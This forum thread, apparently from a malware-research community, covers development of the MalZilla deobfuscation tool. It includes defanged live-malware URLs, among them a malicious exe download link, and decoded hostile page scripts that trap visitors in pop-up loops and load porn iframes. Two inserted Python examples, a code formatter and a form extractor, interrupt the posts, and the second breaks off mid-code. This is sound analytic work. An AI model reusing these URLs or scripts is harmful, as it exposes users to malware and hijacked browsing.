like using Malzilla as a scanner that would have signatures of various exploits,
or adding more standard DOM objects and functions etc...

...just thought that this mailing-list thread might be of some interest to you...'Obfuscated web pages':
http://seclists.org/focus-ids/2008/Feb/0016.html
Title: Re: MalZilla
Post by: tjs on February 27, 2008, 10:50:28 pm
Another weird bug for you... still testing with 0.921

The malware script on the URL below breaks malzilla:
hxxp://updatez.info/etc/count.php?o=22

It throws the following error and does not properly decode the script:

Malzilla
-------
Some violation occured
in SpiderMonkey engine
      [  OK  ]

The page is attached in case the URL gets taken down.

TJS
Title: Re: MalZilla
Post by: bobby on February 28, 2008, 05:01:54 am
Hi TJS,

There is a trap (or bug) if you change or override eval() function.
The script will get stuck in a loop until it gets all the memory/buffers full.

I'll take a closer look at it this evening, after I get back from the job.
I can't decode it either as it uses document.createElement, and Malzilla does not have this DOM implemented.

Until then, use the following link to grab the exe file (got it from the debugger):
hxxp://updatez.info/etc/getexe.exe?o=1&t=1204173798&i=1416818079&e=1



Hi sowhat-x,

I'll take a look this evening. Thanks.

regards
bobby
Title: Re: MalZilla
Post by: bobby on February 28, 2008, 09:30:32 pm
Uploaded new snapshot:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804

Please test and report suggestions/bugs

regards
bobby
Title: Re: MalZilla
Post by: MysteryFCM on February 28, 2008, 10:13:01 pm
Nice one :)
Title: Re: MalZilla
Post by: tjs on February 28, 2008, 11:59:57 pm
Hi Bobby...

Thanks for the new beta... looks like another solid release. I'm very excited about the tabs feature and it's great to see it coming to a reality!

I've found a bunch of bugs in 0.922 and have some suggestions. They are included below.

Thanks again, and keep up the great work!

-TJS


-----
BUGS
-----

default tab name numbering reuse
- Create new tab [New Tab (2)]
- Close first tab [New Tab (1)]
- Create new tab [expected: New Tab (3), actual: New Tab (2)]

'Decode' - 'Selection length' doesn't display selection length when selection occurs due to a 'Find' operation.

Tools: Numbered list Maker is buggy. It puts a random number of \n before the output. Also, if input contains a blank line then the number of \n in output is much larger... sometimes the output is blank. Never noticed this behavior before.

Inconsistent capitalization in tabs (examples - Numbered list Maker vs. Templated list maker, should M be caps or not?) [I know it's a silly bug]

Settings tab, when maximized (on 1024x768) seems broken. The 'Clipboard monitor triggers' section covers most of the replace eval() section. [i can provide a screenshot if you want it]

Putting & in a URL causes the char to get underlined in the tab name (ex. h&ttp://blah.com causes t to get underlined [this is a Windows issue but you can escape it I think])

--------------
SUGGESTIONS
--------------
* CTRL-W to close tab
* Send to decoder to bring decoder window into focus (don't do this for append though)
* make tabs include the top tabs so that you don't need to worry about keeping decode tabs in sync with download tabs
* add a concatenate feature to misc decoders (too many times I see URLs that are split up with "ht"+"tp"+":/".. etc.)
* download/debugger load from file (sometimes I want to just view a file locally without putting it on a webserver)
* download all (with referrer/proxy/cookie/user agent) on numbered list maker (I think everyone uses this for malware with names like 1.exe or loader1.exe) ;)
* option to disable URL history (I hate autocomplete.. it's good in real browsers, not so much here) :)
Title: Re: MalZilla
Post by: bobby on February 29, 2008, 05:07:48 am
Hi TJS,

- default tab name numbering reuse - I'll need to think how to generate the tab numbers
- Decode > Selection length - I can't reproduce. Selection length is on the next line under the Find function here
- I think I just fixed Numbered list maker
- Capitalization - fixed
- Settings tab - will take a look at the Align parameter of components, as I can't reproduce
- & in name - I can just filter this character out of the name. It can't be escaped
- CTRL-W - I have not defined any keyboard shortcuts; will do it in the future for the whole app
- Send to Decoder to bring focus - just to make it optional. It was set once, and it is annoying in a lot of cases
- include top tabs - will test that
- concatenate - not so trivial if one variable is concatenated in more than one line
- load from file - option exists, please take a look at right click menu
- Download all is present on Clipboard Monitor page. I'll need to re-think the inclusion of Clipboard Monitor in future versions, as it messes up the Clipboard.
- URL history - will be optional in future

Which screen resolution do you use?

regards
bobby
Title: Re: MalZilla
Post by: bobby on February 29, 2008, 06:36:22 pm
Quote
Settings tab, when maximized (on 1024x768) seems broken. The 'Clipboard monitor triggers' section covers most of the replace eval() section. [I can provide a screenshot if you want it]

Sorry, didn't see that you already mentioned the screen resolution. I see what you mean.
I'll re-design Settings tab.
Title: Re: MalZilla
Post by: tjs on February 29, 2008, 07:34:47 pm
Another suggestion:

Can you add a checkbox for 'Use Referrer' because sometimes I don't want to use one. Also, I don't like how when I put a new URL it keeps the old Referrer... I understand how this is useful, but I would prefer if when I try to malzilla a new URL it uses the new URL as the referrer or leaves it blank by default.

It would also be nice to have a 'Get to new tab' button in the download section.

Selection length repro:
* Get http://www.malwaredomainlist.com/ then copy/paste page source into decoder
* Search 'Malware', click 'Find'
* 'Malware' is selected, but selection length is 0

Download all in clipboard monitor page makes sense.. I'd still like to avoid having to use the clipboard monitor feature but that's easy enough to work around.

Thanks,
TJS

Title: Re: MalZilla
Post by: bobby on February 29, 2008, 07:53:08 pm
Hi TJS,

I'll make a checkbox for 'Use Referrer', null problemo.

Where exactly do you want to have 'Get to new tab'? On the Download tab? It does not make sense to me.
Or you mean on download section of Clipboard Monitor?

A question: when creating a new tab in Download, should I take some parameters from the current tab (User Agent etc.)?

Selection length problem:
It is calculated only if you select something using the mouse. It is triggered on the onMouseUp event. Should I change this to work on Find too?

I have added right-click menu to Clipboard Monitor list, so you can paste links by hand. There is no need to keep the Clipboard Monitor running.
btw. Clipboard Monitor does not clear the clipboard anymore. This can lead to other issues, but we will see if this is better than clearing the clipboard.

I've also added right-click menu to Debugger's Variable State list, so one can Copy the data from there if the script does not compile.
Title: Re: MalZilla
Post by: sowhat-x on February 29, 2008, 08:16:27 pm
bobby,saw this over at SourceForge,
and it reminded me somehow what was discussed earlier,
regarding the usability of the 'Hex' view...it's Delphi:
http://sourceforge.net/projects/httpbot

What are your thoughts on this...having Malzilla able to also work in proxy-mode at some moment?
This way someone could also interact directly with the sites in question via his/her browser if needed:
i.e. actually have it exploited and also keep records of all actions that took place in the http session...
Not a request,as it is quite a bit of work obviously,just random thoughts regarding future ideas...
Title: Re: MalZilla
Post by: bobby on February 29, 2008, 08:34:55 pm
@sowhat-x

Well, I must admit that I can't manage to add more functionality to Malzilla :(
The existing code needs to be updated all the time because of new scripts which are using new obfuscation techniques, and I can barely manage to get some free time to do that (hope to find some normal job in a couple of months, with normal working times).
Next thing to do is to extend the PScript's functionality, and to work on concatenating variables (TJS' request).
Also, if I can get some help from JavaScript Bridge people (wrapper I use for SpiderMonkey, http://delphi.mozdev.org/ ), I would like to make step-by-step debugger.
Unfortunately, till now I haven't received any useful help from them, and the debugger from the wrapper does not work if I set the step-by-step option (Access violation).
Other things that also need attention are the complicated DOM things like document.createElement.
It is used a lot recently, and I still didn't get behind why I get access violations when I try to manage it.

You will probably also want to take a look at Fiddler if you want to run malware on lamb-box:
http://www.fiddlertool.com/fiddler/
Title: Re: MalZilla
Post by: JohnC on February 29, 2008, 08:43:38 pm
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.
Title: Re: MalZilla
Post by: sowhat-x on February 29, 2008, 09:17:23 pm
I agree 100% with what JohnC said...
wish I could actually give a bit of practical help;to be honest,
that's also the main reason I posted the few links to javascript-related blogs couple days ago,
just in case they provide you with a couple of new tricks/ideas or so...

Since it's still a 'one man's show'...patience,and everything will work out eventually...  ;)
It's not possible to catch up with everything at once,daily life obligations and the rest:
as a guess in the wild,situation must also be quite 'tricky' at the moment there,
with the latest stuff taking place in the Balkan area...
let's just hope things don't get any worse/more complicated than what they currently are...  :-\

And hey,I really mean it when I say 'not request,just random ideas',lol...
I have quite a few of http interceptors around here,perl/python stuff,
some of them I had also converted to standalone exes for use under machines without interpreters...
I'll have to dig my archives and submit them over at some moment during this month...
Title: Re: MalZilla
Post by: tjs on February 29, 2008, 11:41:04 pm
Nice idea about the right click stuff...

About the find length issue-- it's your project, and up to you. I just wanted to report it out because I want to help out in any way that I can :)

I'm not sure about the parameters issue.. I think that if you need the same referrer, then maybe it should remain in the same tab (in other words, don't persist referrer to new tabs) but usually proxy and user agent won't change when an analyst is going through multiple sites...

I agree with sowhat-x that these suggestions are only suggestions.. I don't want to dictate anything here :)

About the 'get to new tab' idea.. Let's say i'm looking at some site in tab (1) and i want to follow a url in a new tab, instead of opening a new tab and then pasting the url, how about letting me paste the url in tab (1) and click open in new tab or something like that.... i dunno, it's just an idea. In ffox/ie7 you can do a control-click on a URL to open it in a new tab- that would be HOT. :)

TJS

Title: Re: MalZilla
Post by: MysteryFCM on March 01, 2008, 12:10:13 am
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.

I'd have offered help when he first started developing it but I don't know Delphi .... :( (hoping to find some time to learn both Delphi and Ruby within the next 12 months - don't have much of it free)
Title: Re: MalZilla
Post by: tjs on March 04, 2008, 02:13:05 am
This page is using decode64() in conjunction with unescape().. Am I doing something wrong or is the decode section in malzilla unable to iterate through decode64()?

Example (live malware):
Quote
hxxp://radt.info/?0a2V5d29yZD1Xd3crTWF0dXJlK1ZpcA==

TJS

Attached in case the URL 404s.
Title: Re: MalZilla
Post by: MysteryFCM on March 04, 2008, 02:27:13 am
Decoded just* fine with Malzilla?

*typo correction

Code:
<html>
<head>
<title>Www Mature Vip</title>
<meta name="robots" CONTENT="noindex, nofollow, noarchive">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script language="javascript" src="/d.js"></script>
<script language="javascript">
var enter_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
var exit_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
</script>
<script language="jscript.encode" src="/pop31.js"></script>
</head>
<body onunload="entrapment(0)" bottommargin="0" leftmargin="0" marginheight="0" marginwidth="0" rightmargin="0" topmargin="0">
<script language="javascript">
var sts = "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";
document.write(unescape(decode64(sts)));
</script>
<script src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></script>
<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=pornstars" width="100%"  height="1500" scrolling="no" frameborder="0"></iframe>
<script language="jscript.encode" src="/pop32.js"></script>
</body>
</html>

Code:
<script type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></script><noscript><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscript>
The decode64 function is held in a separate JS file, so you'd need to copy it over first;

Code:
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/d.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:26:02:26
*****************************************************************
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + //all caps
             "abcdefghijklmnopqrstuvwxyz" + //all lowercase
             "0123456789+/="; // all numbers plus +/=

//Here's the decode function
function decode64(inp)
{
    var out = ""; //This is the output
    var chr1, chr2, chr3 = ""; //These are the 3 decoded bytes
    var enc1, enc2, enc3, enc4 = ""; //These are the 4 bytes to be decoded
    var i = 0; //Position counter

    // remove all characters that are not A-Z, a-z, 0-9, +, /, or =
    var base64test = /[^A-Za-z0-9\+\/\=]/g;

    if (base64test.exec(inp)) { //Do some error checking
        alert("There were invalid base64 characters in the input text.\n" +
              "Valid base64 characters are A-Z, a-z, 0-9, '+', '/', and '='\n" +
              "Expect errors in decoding.");
    }
    inp = inp.replace(/[^A-Za-z0-9\+\/\=]/g, "");

    do { //Here's the decode loop.

        //Grab 4 bytes of encoded content.
        enc1 = keyStr.indexOf(inp.charAt(i++));
        enc2 = keyStr.indexOf(inp.charAt(i++));
        enc3 = keyStr.indexOf(inp.charAt(i++));
        enc4 = keyStr.indexOf(inp.charAt(i++));

        //Here's the decode part. There's really only one way to do it.
        chr1 = (enc1 << 2) | (enc2 >> 4);
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;

        //Start to output decoded content
        out = out + String.fromCharCode(chr1);

        if (enc3 != 64) {
            out = out + String.fromCharCode(chr2);
        }
        if (enc4 != 64) {
            out = out + String.fromCharCode(chr3);
        }

        //now clean out the variables used
        chr1 = chr2 = chr3 = "";
        enc1 = enc2 = enc3 = enc4 = "";

    } while (i < inp.length); //finish off the loop

    //Now return the decoded values.
    return out;
}
Title: Re: MalZilla
Post by: MysteryFCM on March 04, 2008, 02:30:05 am
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;

Code:
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/pop32.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:28:10:28
*****************************************************************
#@~^cgMAAA==r6Pc6bY{!D^Z'rJbP9W^;s+xD hMkYcE@!K4NJQJn^DPrN{^W,hr[Dt'T~4+ro4O{!~1Vm/J3JkrN{B/SUJQE&f)+$J3Jsl+)*yO2,E_E*zOqFGfO~FEQr*&RTZZE_rTWs{OszbvE@*@!&W(LE_r+^O@*J#p~k6P`UO+M{!Ds"xEr#~NK^Es+UOchDrO`E@!K8NJQr+1YP1Vmd/bNxB1Vdr9)Ny{m94vRC++N FqmWROv8% *cW*Xflc!TTZB~mK[4Ck+{BtDYalzJNGh VGC9R:m^DK:+9rCR1Wsz2E8&ktGm0Al7+&^m4/&W^ldtJdS0sm/4Rmm4[-+M/rW '{SZ~!BTB,hk9O4'EFEP4+rL4YxB8vPmVrL 'Bhr9Ns+E@*r_E@!wmDJ3JmhP lh+{BCs^WhU^DbwYz^^+k/EP-ls;'v/mh+GWhCbxB~&@*JQJ@!2mDE3Jm:P lsn'E:G\b+v~7lV!n'EwWaf /S0Qj.VxE3+UY.{!DsQrBP&@*r_E@!aCMJQrlsPxm:xB$ECVbYzv,\l^;+{BtbL4B,z@*@!2l.CsP~xmh+{B8L1WVG.EP-l^;'v[060060E~z@*JQJ@!+hE3J4[PkDm{v2Wa&c/A0_iMVxJ3nxD+.m!DVQEEP5EmsbYz{B4ko4B,8o1WsWM'v:6006W0EPhb[Ot{B8B~tnrTtO'EqB,xCh'B2.K:vPmsboU{BskN9VvPmVsWS?^.bwYz^m//{vdls+GWhlrUEPOXan'El22^kmCObWUzXRktG13Sl\O6slktvPaV;Lbx/aCo'B4OOw=zJhAh hmm.WsnNbl ^K:zLGJonY6sm/4aVmX+MB,&@*r_E@!JW8%r_J^Y@*J#p5xUBAA==^#~@

Code:
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:29:49:29
*****************************************************************
var noentrap = 0;

function entrapment(entcount) {
if (noentrap) return true;
entcount++;
document.open();
document.write('<html><head><title>Www Mature Vip</title><style type="text/css"><!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --></style></head><body onunload="entrapment(' + entcount + ')">' +
'<scr' + 'ipt src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></scr' + 'ipt><scr' + 'ipt type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></scr' + 'ipt><noscr' + 'ipt><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscr' + 'ipt>' +
'<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=celebs" width="100%"  height="1500" scrolling="no" frameborder="0"></iframe>');
document.close();
}
Title: Re: MalZilla
Post by: bobby on March 04, 2008, 04:42:39 am
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;

Decoder for jscript.encode is on Misc Decoders tab (Decode JS.encode).
Title: Re: MalZilla
Post by: MysteryFCM on March 04, 2008, 04:01:15 pm
Ah right hehe ...... I'd forgotten about that  :-[
Title: Re: MalZilla
Post by: bobby on March 04, 2008, 08:13:56 pm
Ah right hehe ...... I'd forgotten about that  :-[

Not your fault, I'm the one who does not have enough time to document all the functions.


@TJS
Just to let you know that "concatenate" function is implemented :)
Title: Re: MalZilla
Post by: tjs on March 04, 2008, 09:03:50 pm
woot! :)
Title: Re: MalZilla
Post by: bobby on March 07, 2008, 11:49:21 pm
0.9.3pre3 (0.9.2.3) uploaded to SourceForge one minute ago.
I do not know how long it will take until all the mirrors get updated, but I hope in a couple of hours it should be available for download.
Title: Re: MalZilla
Post by: tjs on March 07, 2008, 11:51:40 pm
Another suggestion-- can we get 'format text' to work on page content (in 'download' tab)?

Thanks for the new release!
TJS

Title: Re: MalZilla
Post by: bobby on March 07, 2008, 11:55:56 pm
Another suggestion-- can we get 'format text' to work on page content (in 'download' tab)?

Thanks for the new release!
TJS



Format text is gone (with the wind).
It was useless...
It added a line-break after every semi-colon, and that does damage in a lot of cases.

I will search for a better tokenizer for formatting text, but as for now I have none that is working like it should.
Title: Re: MalZilla
Post by: bobby on March 08, 2008, 12:05:21 am
Another suggestion:

Can you add a checkbox for 'Use Referrer' because sometimes I don't want to use one. Also, I don't like how when I put a new URL it keeps the old Referrer... I understand how this is useful, but I would prefer if when I try to malzilla a new URL it uses the new URL as the referrer or leaves it blank by default.

....

Thanks,
TJS


Isn't un-checking Auto-set referrer on the Settings tab exactly what you need?
Title: Re: MalZilla
Post by: tjs on March 08, 2008, 01:37:30 am
Two responses:

Format text is _NOT_ useless! I use it almost every single time I analyze a malware page. Please don't remove it, otherwise I'll be hacking at your source and recompiling a private build for myself with it. I think even in its limited form it is a great feature to improve readability of scripts.

Referrer settings on the download tab is better because, like using a useragent/cookies/proxy, sometimes you want it and sometimes you don't. In most cases, I don't, particularly because I usually analyze many sites at the same time, which causes me to 'share' the last site I looked at with the current one via referrer. I'm cool with having it on the settings page, but in that case, why not move the proxy, user agent and cookies options there too?

TJS
Title: Re: MalZilla
Post by: MysteryFCM on March 08, 2008, 01:38:58 am
I vote to restore the format code option too :)
Title: Re: MalZilla
Post by: sowhat-x on March 08, 2008, 04:38:07 am
(http://img364.imageshack.us/img364/9845/gonewiththewindpg4.png)

Rotflmao... ;D
Ok,seriously now...
If it's not much trouble,I also vote for it to be re-included...
Title: Re: MalZilla
Post by: bobby on March 08, 2008, 08:29:36 am
Hi guys,

The code for that Format text was something like:

if you see a semi-colon, replace it with semi-colon + line break.

Translated to Pascal, that is exactly one line of code.
It is not a problem to bring it back, but that rule for inserting line breaks is simply wrong.
One should take care of tokens, and put a line break only if the semi-colon is the end of a token.

The biggest problem was that, if you click it 2-3 times, your text ends up with a bunch of line breaks one after another.

I will really search for a better solution. It should not be far away. I just need to study the code of the highlighter I'm using there - the highlighter does know where the ends of tokens are.
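A token-aware version of that rule, as an added example in Python (not Malzilla's Delphi code; function names are my own): a line break goes after a semicolon only when it is a real token that ends a statement, and running the function a second time changes nothing, so repeated clicks cannot pile up blank lines.

```python
"""Token-aware 'Format code' for obfuscated JavaScript (added example).

A line break is inserted after a semicolon only when that semicolon is a real
token that ends a statement: not inside a string literal, regex literal or
comment, and not inside the parentheses of a for (init; test; step) header.
Applying format_code twice gives the same text, so repeated clicks cannot
pile up blank lines the way the old one-line rule did.
"""

# Characters after which a '/' begins a regex literal instead of a division.
# At the start of the input last_sig is "" and "" in this string is True.
_REGEX_PRECEDERS = "=(,:[!&|?{};+-*%<>~^"


def format_text_naive(src: str) -> str:
    """The old one-line rule: breaks strings, regexes and for headers too."""
    return src.replace(";", ";\n")


def format_code(src: str) -> str:
    out = []
    i, n = 0, len(src)
    depth = 0        # ( ) nesting; a ';' at depth > 0 belongs to a for header
    last_sig = ""    # last non-space character emitted outside comments
    while i < n:
        c = src[i]
        # Comments are copied verbatim; a ';' inside one is not a token.
        if src.startswith("//", i):
            j = src.find("\n", i)
            j = n if j == -1 else j
            out.append(src[i:j]); i = j
            continue
        if src.startswith("/*", i):
            j = src.find("*/", i + 2)
            j = n if j == -1 else j + 2
            out.append(src[i:j]); i = j
            continue
        # String literal: skip to the matching quote, honouring backslash escapes.
        if c in "\"'":
            j = i + 1
            while j < n and src[j] not in (c, "\n"):
                j += 2 if src[j] == "\\" else 1
            if j < n and src[j] == c:
                j += 1                                # include the closing quote
            out.append(src[i:j]); last_sig = c; i = j
            continue
        # Regex literal: a '/' in operand position (keyword cases such as
        # 'return /x/' are treated as division; rare in obfuscated scripts).
        if c == "/" and last_sig in _REGEX_PRECEDERS:
            j, in_class = i + 1, False
            while j < n and src[j] != "\n" and (src[j] != "/" or in_class):
                if src[j] == "\\":
                    j += 1                            # skip the escaped char
                elif src[j] == "[":
                    in_class = True
                elif src[j] == "]":
                    in_class = False
                j += 1
            if j < n and src[j] == "/":
                j += 1
            while j < n and src[j].isalpha():         # flags such as /g or /i
                j += 1
            out.append(src[i:j]); last_sig = "/"; i = j
            continue
        # Any other character.
        if c == "(":
            depth += 1
        elif c == ")":
            depth = max(0, depth - 1)
        out.append(c)
        if not c.isspace():
            last_sig = c
        i += 1
        if c == ";" and depth == 0:
            # Statement end: add a break unless the source already has one here.
            k = i
            while k < n and src[k] in " \t":
                k += 1
            if not (k < n and src[k] == "\n"):
                out.append("\n")
                i = k                                 # drop trailing spaces
    return "".join(out)
```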
Title: Re: MalZilla
Post by: MysteryFCM on March 08, 2008, 08:33:09 am
hehe no worries :)

Btw, did you see the code I posted in Blender's latest thread at MR? (Malzilla couldn't work with it)
Title: Re: MalZilla
Post by: bobby on March 08, 2008, 09:35:03 am
hehe no worries :)

Btw, did you see the code I posted in Blender's latest thread at MR? (Malzilla couldn't work with it)
That code is full of references to DOM objects that Malzilla does not support.
After removing some of the references, I've managed to get it decoded.

btw.
Quote
This page is protected by unregistered version of Right HTML Protector
Title: Re: MalZilla
Post by: MysteryFCM on March 08, 2008, 09:39:32 am
Oh right, hehe
Title: Re: MalZilla
Post by: bobby on March 09, 2008, 12:47:27 am
Format Text is dead, long live Format Code!

Who wants to play with the new formatting?
http://malzilla.sourceforge.net/test/

Pick the new exe (you already have the DLLs from previous downloads). There is new formatting for the Decode tab.
I'll test tomorrow how well it works with HTML code, to see how to deal with Download tab code formatting.

Please test, and tell me if it works well or badly for you.

Take into account that the formatting can break some code from executing (code checking for function length).
Title: Re: MalZilla
Post by: MysteryFCM on March 09, 2008, 03:16:47 pm
Seems to work perfectly :) ......
Title: Re: MalZilla
Post by: bobby on March 09, 2008, 04:53:11 pm
New upload to http://malzilla.sourceforge.net/test/
(overwritten the previous upload)

Please test:
Ctrl + Send to Decoder
Ctrl + Send all to Decoder
Format code on Download tab
Title: Re: MalZilla
Post by: MysteryFCM on March 09, 2008, 05:01:40 pm
Works perfectly here :)
Title: Re: MalZilla
Post by: bobby on March 16, 2008, 02:08:30 pm
Just to let you know that now we have a very own hacked version of SpiderMonkey that will let us decode these scripts where we used debugger to see the downloading link for EXE. See the bug report from TJS here: http://www.malwaredomainlist.com/forums/index.php?topic=218.msg2225#msg2225

The process is time-consuming (1-2 minutes for the script attached by TJS), but at the end you will have the source code of the exploit :)

Will upload a new version as soon as I implement this feature in the GUI.
I can't promise that I'll do this in the next few days, so if someone needs this feature urgently I can upload the hacked SpiderMonkey and the instructions on how to use this feature manually.

Happy hacking ;)
Title: Re: MalZilla
Post by: sowhat-x on March 16, 2008, 02:49:56 pm
Idea that came to mind while digging through stuff locally...

Both 'Cookies' and 'Links Parser' extraction are obviously already there....
what about a 'Forms' extraction tab maybe?  ::)
I also have a couple of Delphi sources archived here,
meant exactly for this feature/capability... ;)
Title: Re: MalZilla
Post by: bobby on March 16, 2008, 06:44:04 pm
Hi sowhat-x,

Any examples of files with Forms that would need to be extracted?
I'm not some HTML guru, so I would need a couple of examples to see what needs to be done.
If it is a tag, Malzilla already has a tag extraction engine, I just need to tell it to extract this one too.

Please, write your suggestions here.
Day after tomorrow I'll have some time in the evening to code, so if anyone has a suggestion - please write it before that.
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2008, 08:05:40 pm
Standard code for forms is;

Code:
<form name="{VALUE}" action="{FILE}" method="{POST_OR_GET}">
{FIELDS}
</form>

Where {FIELDS} is typically one or more of the following;

Code:
<input type="text" ....>
<input type="hidden" ...>
<input type="checkbox" ....>
<input type="password" ....>
<input type="radio" .....>
<textarea .....>
<select ....>

The spec is available at;

http://www.w3.org/TR/html4/interact/forms.html

The spec mentions the use of LABEL for the field names;

Code:
<FORM action="http://somesite.com/prog/adduser" method="post">
    <P>
    <LABEL for="firstname">First name: </LABEL>
              <INPUT type="text" id="firstname"><BR>
    <LABEL for="lastname">Last name: </LABEL>
              <INPUT type="text" id="lastname"><BR>
    <LABEL for="email">email: </LABEL>
              <INPUT type="text" id="email"><BR>
    <INPUT type="radio" name="sex" value="Male"> Male<BR>
    <INPUT type="radio" name="sex" value="Female"> Female<BR>
    <INPUT type="submit" value="Send"> <INPUT type="reset">
    </P>
 </FORM>

... but I've never seen anyone use that ..... typically people use td's to separate these, for example;

Code:
<form action="{file}" name="{VALUE}" method="{GET_OR_POST}">
<table>
<tr><td>Name:</td><td><input type="{TYPE}"></td></tr>
</table>
</form>
Title: Re: MalZilla
Post by: bobby on March 16, 2008, 08:24:22 pm
Ah, I got it now, thanks MysteryFCM.
I didn't realize it is about POST forms (that's what I call them, probably wrong but...)

@sowhat-x
Problem is, I don't get it what I should extract here?
You want me to render the form, so you can enter values and send the form data?
Malzilla intentionally does not have any rendering engine. That way it can stay away from being exploited in the same manner as browsers are exploited.
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2008, 08:40:27 pm
Malzilla intentionally does not have any rendering engine. That way it can stay away from being exploited in the same manner as browsers are exploited.

Same reason vURL DE doesn't :)
Title: Re: MalZilla
Post by: sowhat-x on March 16, 2008, 09:27:39 pm
...MysteryFCM was way faster than me in replying,he-he...
yes,it's 'post' forms I was talking about,and actually,
I was afraid of the term being confused with...Delphi 'forms' themselves,lol...  :)
Have a look at this python app called 'twill' for example,
among other things,the 'showforms' command can give the very exact idea of it:
http://twill.idyll.org/

Being able to fill in/send 'post' data is not of that much interest I guess,
it's not 'web application' testing after all...I mean,I have never seen some kind of infected page,
that 'rotates'/pushes different exploits and malware,depending on user's input on post forms...
Maybe others more experienced have,I certainly haven't though...brrr...nasty thought...

Simply listing them though,separated from the rest of the html code,would be quite nice...
i.e. to have a more 'clean' idea of the html's structure...
Title: Re: MalZilla
Post by: bobby on March 16, 2008, 09:40:43 pm
I did see some web sites that required POST data to get the process to continue.
In one such case I have worked together with MysteryFCM :)

The fact is, in the last two years I have probably seen some 5 such cases.
Some kind of POST editor does exist on my ToDo list for Malzilla, but I didn't give it any priority and I do not have a clear picture what it should look like.

I still do not have a clear picture what a form tab should show to the user...
List of forms (does every form in HTML have a unique identifier if more than one form is on the page)?
Separate tab for every form found which would show the code of that form?
Title: Re: MalZilla
Post by: sowhat-x on March 16, 2008, 09:42:38 pm
...or another one that came to mind, a really old VB-coded app,
that was called 'Form Scalpel'...it is still available from PacketStorm's repository:
http://packetstormsecurity.org/web/index2.html
Honestly though,don't really bother yourself much with it,
as this is something that simply helps in reading/breaking down the html structure,
i.e. it certainly doesn't help in making the malware scripts themselves more 'readable' in any way...

Quote
I still do not have a clear picture what a form tab should show to the user...
Something somewhat similar to 'Judas' that I posted today in the forum,
or say like 'Form' came to mind...want me to upload somewhere else instead of Rapidshare?
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2008, 09:53:51 pm
Bobby,
Generally speaking, the form tag will include either "name", "id" or both (e.g. name="{NAME}" or id="{ID}"). However, as nested forms are very rare, it's generally just a case of parsing out everything between the opening and closing form tags (and where more than one form is present, then processing the second, third whatever form).

I'm not sure about Delphi, but with MS XML, it's simply a case of identifying which method it expects (GET or POST), then identifying the fields it is expecting (including the hidden ones), then sending the data it's expecting via an XML request.

To have this in Malzilla would probably be best by doing the following;

1. ID the form and its action value
2. ID the fields within the form
3. Provide a string builder for the fields the form expects

Obviously it'll not be as simple as I've made it sound, but it's just a thought :)
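The three steps above as an added example in Python's standard library (not Malzilla's Delphi code and not vURL; the function names, sample HTML and base URL are constructed): it lists every form with its action and method, the fields it expects (hidden ones included), and the request string those fields would produce, without rendering anything.

```python
"""Form extraction without a rendering engine: added example, Python stdlib only.
Step 1: each form's name/id, action and method. Step 2: the fields it expects,
hidden ones included. Step 3: the GET/POST request string. Nothing is rendered."""
from html.parser import HTMLParser
from urllib.parse import urlencode, urljoin

# Constructed sample: a W3C-style form and a table-laid-out login form.
SAMPLE_HTML = """<html><body>
<form action="/prog/adduser" method="post">
  <label for="firstname">First name:</label><input type="text" id="firstname" name="first"><br>
  <label for="lastname">Last name:</label><input type="text" id="lastname"><br>
  <input type="radio" name="sex" value="Male"> Male
  <input type="radio" name="sex" value="Female" checked> Female
  <input type="submit" value="Send"> <input type="reset">
</form>
<form name="login" action="http://host.example/login.php" method="GET">
<table>
<tr><td>User:</td><td><input type="text" name="user" value="guest"></td></tr>
<tr><td>Pass:</td><td><input type="password" name="pass"></td></tr>
<tr><td>Lang:</td><td><select name="lang"><option value="en">English
<option value="de" selected>Deutsch</select></td></tr>
<tr><td>Note:</td><td><textarea name="note">hi</textarea></td></tr>
</table>
<input type="hidden" name="token" value="x y/z">
</form></body></html>"""


class FormExtractor(HTMLParser):  # steps 1 and 2: forms, actions, fields
    def __init__(self):
        super().__init__()
        self.forms = []            # completed forms, in document order
        self._form = self._select = self._option = self._textarea = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"name": a.get("name") or a.get("id") or "",
                          "action": a.get("action") or "",
                          "method": (a.get("method") or "get").upper(), "fields": []}
        elif self._form is None:
            return                 # outside any form
        elif tag == "input":
            itype = (a.get("type") or "text").lower()
            if itype in ("submit", "reset", "button", "image"):
                return             # buttons carry no data
            if itype in ("checkbox", "radio") and "checked" not in a:
                return             # unchecked boxes/radios are not submitted
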